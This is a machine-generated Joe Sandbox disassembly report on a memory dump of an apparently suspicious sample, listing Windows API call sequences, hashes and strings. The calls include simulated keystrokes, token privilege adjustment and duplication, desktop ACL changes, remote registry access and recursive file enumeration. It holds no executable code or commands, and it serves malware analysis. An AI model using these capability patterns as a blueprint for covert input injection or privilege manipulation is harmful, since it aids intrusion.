                                                                            • Opcode Fuzzy Hash: 8f741025b64d56a28ba659732599d018ce6688917e3ea0a5d533c2c99ad317fc
                                                                            • Instruction Fuzzy Hash: FE42AD74204741AFDB20EF28C848EAABBE5FF49320F140629F659C72B5D771E844DB62
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_memset
                                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                            • API String ID: 1357608183-1798697756
                                                                            • Opcode ID: 4074268cbe372d80987b8a0f9c932abe27a692540b4600758db7440d39d3c0ae
                                                                            • Instruction ID: 5f3da692b721eae4a7de49f743420b085d549a93788b14b0b090983642608bd0
                                                                            • Opcode Fuzzy Hash: 4074268cbe372d80987b8a0f9c932abe27a692540b4600758db7440d39d3c0ae
                                                                            • Instruction Fuzzy Hash: A1939D75A04219DBDB24CFA8C881BEDB7B1FF48355F24816AED45EB281E7709E85CB40
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 008048DF
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0083D665
                                                                            • IsIconic.USER32(?), ref: 0083D66E
                                                                            • ShowWindow.USER32(?,00000009), ref: 0083D67B
                                                                            • SetForegroundWindow.USER32(?), ref: 0083D685
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0083D69B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0083D6A2
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083D6AE
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6BF
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6C7
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0083D6CF
                                                                            • SetForegroundWindow.USER32(?), ref: 0083D6D2
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6E7
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0083D6F2
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6FC
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0083D701
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D70A
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0083D70F
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D719
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0083D71E
                                                                            • SetForegroundWindow.USER32(?), ref: 0083D721
                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0083D748
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: fa9108320540ed23bf8595b96e262749423e028cb6618596724c69a196e64160
                                                                            • Instruction ID: 7be90da7e8f7e26a3a1178c434a7668be05895544a4b57453fcfc1bfbe6f301a
                                                                            • Opcode Fuzzy Hash: fa9108320540ed23bf8595b96e262749423e028cb6618596724c69a196e64160
                                                                            • Instruction Fuzzy Hash: 26317271A40318BBEB206B659C4AF7F7E6CFB84B50F104025FB05EA1D2D6B05911ABE0
                                                                            APIs
                                                                              • Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                                              • Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                                              • Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
                                                                            • _memset.LIBCMT ref: 00858353
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008583A5
                                                                            • CloseHandle.KERNEL32(?), ref: 008583B6
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008583CD
                                                                            • GetProcessWindowStation.USER32 ref: 008583E6
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 008583F0
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0085840A
                                                                              • Part of subcall function 008581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
                                                                              • Part of subcall function 008581CB: CloseHandle.KERNEL32(?,?,00858309), ref: 008581F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 2063423040-1027155976
                                                                            • Opcode ID: c812a4deaf9e9db3898ad6a7950606a0a30e89f0ec9d784eca79c232a668df23
                                                                            • Instruction ID: a3b665ff41ead2631233775976704562ae3395d0bb181cd2fa82fd73439b51bd
                                                                            • Opcode Fuzzy Hash: c812a4deaf9e9db3898ad6a7950606a0a30e89f0ec9d784eca79c232a668df23
                                                                            • Instruction Fuzzy Hash: 85812575900209EEDF119FA8DC45AEEBBB9FF08305F14416AFD14F6261EB318A189B21
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0086C78D
                                                                            • FindClose.KERNEL32(00000000), ref: 0086C7E1
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C806
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C81D
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0086C844
                                                                            • __swprintf.LIBCMT ref: 0086C890
                                                                            • __swprintf.LIBCMT ref: 0086C8D3
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            • __swprintf.LIBCMT ref: 0086C927
                                                                              • Part of subcall function 00823698: __woutput_l.LIBCMT ref: 008236F1
                                                                            • __swprintf.LIBCMT ref: 0086C975
                                                                              • Part of subcall function 00823698: __flsbuf.LIBCMT ref: 00823713
                                                                              • Part of subcall function 00823698: __flsbuf.LIBCMT ref: 0082372B
                                                                            • __swprintf.LIBCMT ref: 0086C9C4
                                                                            • __swprintf.LIBCMT ref: 0086CA13
                                                                            • __swprintf.LIBCMT ref: 0086CA62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 3953360268-2428617273
                                                                            • Opcode ID: e646a5fa42715833bab64e1f8dc626ce856faf11427f801bb0272176a1019e4d
                                                                            • Instruction ID: 00a2ac69239b42dc872c72d9a85298d1d4850a0ea27d9c7bbd162a5c58667a24
                                                                            • Opcode Fuzzy Hash: e646a5fa42715833bab64e1f8dc626ce856faf11427f801bb0272176a1019e4d
                                                                            • Instruction Fuzzy Hash: 88A11DB1404204ABC750EFA8DC85DAFB7ECFF95704F404929F595C6292EA34DA48CB63
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0086EFB6
                                                                            • _wcscmp.LIBCMT ref: 0086EFCB
                                                                            • _wcscmp.LIBCMT ref: 0086EFE2
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0086EFF4
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0086F00E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0086F026
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F031
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F04D
                                                                            • _wcscmp.LIBCMT ref: 0086F074
                                                                            • _wcscmp.LIBCMT ref: 0086F08B
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F09D
                                                                            • SetCurrentDirectoryW.KERNEL32(008B8920), ref: 0086F0BB
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F0C5
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F0D2
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F0E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1803514871-438819550
                                                                            • Opcode ID: 074087e07c16ea540d85fae8a3a6a0456fc404700b232afe0deda3d064ab50d0
                                                                            • Instruction ID: 3aceb367db35c16d629cb426b26cf7c8594733e78c90c8385ee8abb6807656c2
                                                                            • Opcode Fuzzy Hash: 074087e07c16ea540d85fae8a3a6a0456fc404700b232afe0deda3d064ab50d0
                                                                            • Instruction Fuzzy Hash: 3131B4325016196BDB14EFA8EC49AEE77ACFF48360F110175EA14D2192DB74DA84CF62
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880953
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0088F910,00000000,?,00000000,?,?), ref: 008809C1
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00880A09
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00880A92
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00880DB2
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00880DBF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: f2869f6571d4eebcc7c63aaca7800fd11d95ff29125e238564b86ffca0590b34
                                                                            • Instruction ID: 15543e56107c4846c8abd3001786493afa5a1741ffc115ea4b1fbafeaff7c662
                                                                            • Opcode Fuzzy Hash: f2869f6571d4eebcc7c63aaca7800fd11d95ff29125e238564b86ffca0590b34
                                                                            • Instruction Fuzzy Hash: 620238756046119FCB54EF28D841E2AB7E5FF89314F048568F99ADB3A2DB30EC45CB82
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0086F113
                                                                            • _wcscmp.LIBCMT ref: 0086F128
                                                                            • _wcscmp.LIBCMT ref: 0086F13F
                                                                              • Part of subcall function 00864385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008643A0
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0086F16E
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F179
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F195
                                                                            • _wcscmp.LIBCMT ref: 0086F1BC
                                                                            • _wcscmp.LIBCMT ref: 0086F1D3
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F1E5
                                                                            • SetCurrentDirectoryW.KERNEL32(008B8920), ref: 0086F203
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F20D
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F21A
                                                                            • FindClose.KERNEL32(00000000), ref: 0086F22C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 1824444939-438819550
                                                                            • Opcode ID: ccd4c261221c333e67bdc041ff11be04ec9d08e294b5c4ea14e83f3816951e54
                                                                            • Instruction ID: 060170e47717cf857d68dd7f7f94653b2d0edaec6660e6a92e160fac44e0401e
                                                                            • Opcode Fuzzy Hash: ccd4c261221c333e67bdc041ff11be04ec9d08e294b5c4ea14e83f3816951e54
                                                                            • Instruction Fuzzy Hash: 1C31C436500219AADB20AF68FC59EEE77ACFF45360F110171FA14E2292DB34DA85CF64
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0086A20F
                                                                            • __swprintf.LIBCMT ref: 0086A231
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0086A26E
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0086A293
                                                                            • _memset.LIBCMT ref: 0086A2B2
                                                                            • _wcsncpy.LIBCMT ref: 0086A2EE
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0086A323
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0086A32E
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0086A337
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0086A341
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: 5b78bfe6ce8e03c12c06c77825899d0b918e49df8db2203de7dede2a725327c9
                                                                            • Instruction ID: 6d16317e10483618c65df60ac73b902cf940ad030d701f8bc750f1f4ecda4075
                                                                            • Opcode Fuzzy Hash: 5b78bfe6ce8e03c12c06c77825899d0b918e49df8db2203de7dede2a725327c9
                                                                            • Instruction Fuzzy Hash: 0231B2B5500119ABDB21DFA4DC49FEB77BCFF88701F1040B6F608E2261EB7096848B25
                                                                            APIs
                                                                              • Part of subcall function 00858202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0085821E
                                                                              • Part of subcall function 00858202: GetLastError.KERNEL32(?,00857CE2,?,?,?), ref: 00858228
                                                                              • Part of subcall function 00858202: GetProcessHeap.KERNEL32(00000008,?,?,00857CE2,?,?,?), ref: 00858237
                                                                              • Part of subcall function 00858202: HeapAlloc.KERNEL32(00000000,?,00857CE2,?,?,?), ref: 0085823E
                                                                              • Part of subcall function 00858202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858255
                                                                              • Part of subcall function 0085829F: GetProcessHeap.KERNEL32(00000008,00857CF8,00000000,00000000,?,00857CF8,?), ref: 008582AB
                                                                              • Part of subcall function 0085829F: HeapAlloc.KERNEL32(00000000,?,00857CF8,?), ref: 008582B2
                                                                              • Part of subcall function 0085829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00857CF8,?), ref: 008582C3
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00857D13
                                                                            • _memset.LIBCMT ref: 00857D28
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00857D47
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00857D58
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00857D95
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00857DB1
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00857DCE
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00857DDD
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00857DE4
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00857E05
                                                                            • CopySid.ADVAPI32(00000000), ref: 00857E0C
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00857E3D
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00857E63
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00857E77
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 1044a48045b3241d4bf1a419dafdd17d3eea41e848927b184112f930d4924f4d
                                                                            • Instruction ID: 63b5a138faba3cf1c75d5c81ea589f37416775ab6e00e89e941b9a612c6804db
                                                                            • Opcode Fuzzy Hash: 1044a48045b3241d4bf1a419dafdd17d3eea41e848927b184112f930d4924f4d
                                                                            • Instruction Fuzzy Hash: D6617A71900609EFDF01CFA8EC85AEEBB79FF04701F44816AE915E6291DB319E09CB60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                            • API String ID: 0-4052911093
                                                                            • Opcode ID: 5e6183bcc33546d1373d01b70bb06fc1219a03af4a3b8423f5ac4df60a59738d
                                                                            • Instruction ID: 445978c7de024f28289768b66f3da7dd69dc504fe5491a863a5db402879e9b75
                                                                            • Opcode Fuzzy Hash: 5e6183bcc33546d1373d01b70bb06fc1219a03af4a3b8423f5ac4df60a59738d
                                                                            • Instruction Fuzzy Hash: 08727D75E00219DBDF24CF58C8947EEB7B5FF48315F14816AE949EB280EB349A85CB90
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00860097
                                                                            • SetKeyboardState.USER32(?), ref: 00860102
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00860122
                                                                            • GetKeyState.USER32(000000A0), ref: 00860139
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00860168
                                                                            • GetKeyState.USER32(000000A1), ref: 00860179
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 008601A5
                                                                            • GetKeyState.USER32(00000011), ref: 008601B3
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 008601DC
                                                                            • GetKeyState.USER32(00000012), ref: 008601EA
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00860213
                                                                            • GetKeyState.USER32(0000005B), ref: 00860221
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: ee95083ed532101aeb6593a681148eb02adc5a098c13af2f905e81e18931ef14
                                                                            • Instruction ID: cda3ddec7eb214e7ad85368380abb2c126bc272e96f79a26d0420fdfbca11fd9
                                                                            • Opcode Fuzzy Hash: ee95083ed532101aeb6593a681148eb02adc5a098c13af2f905e81e18931ef14
                                                                            • Instruction Fuzzy Hash: 9D51ED2090478829FB35D76489147EBBFB4FF12380F094599D5C29A1C3DAA49B8CCF66
                                                                            APIs
                                                                              • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0087FDAD,?,?), ref: 00880E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008804AC
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0088054B
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008805E3
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00880822
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0088082F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: 06001ce94bc4e2a30f1f7f6ae97a7ed62c66511a93f7cc51d7d7985fe6a40861
                                                                            • Instruction ID: 2b8905b69b0dcb28ad91e4c36456f3a3047061a4dad75784f7a7212f8634105d
                                                                            • Opcode Fuzzy Hash: 06001ce94bc4e2a30f1f7f6ae97a7ed62c66511a93f7cc51d7d7985fe6a40861
                                                                            • Instruction Fuzzy Hash: 21E15F71604214AFCB54EF28C891D2ABBE4FF89314B04856DF949D72A2D731E945CF52
                                                                            APIs
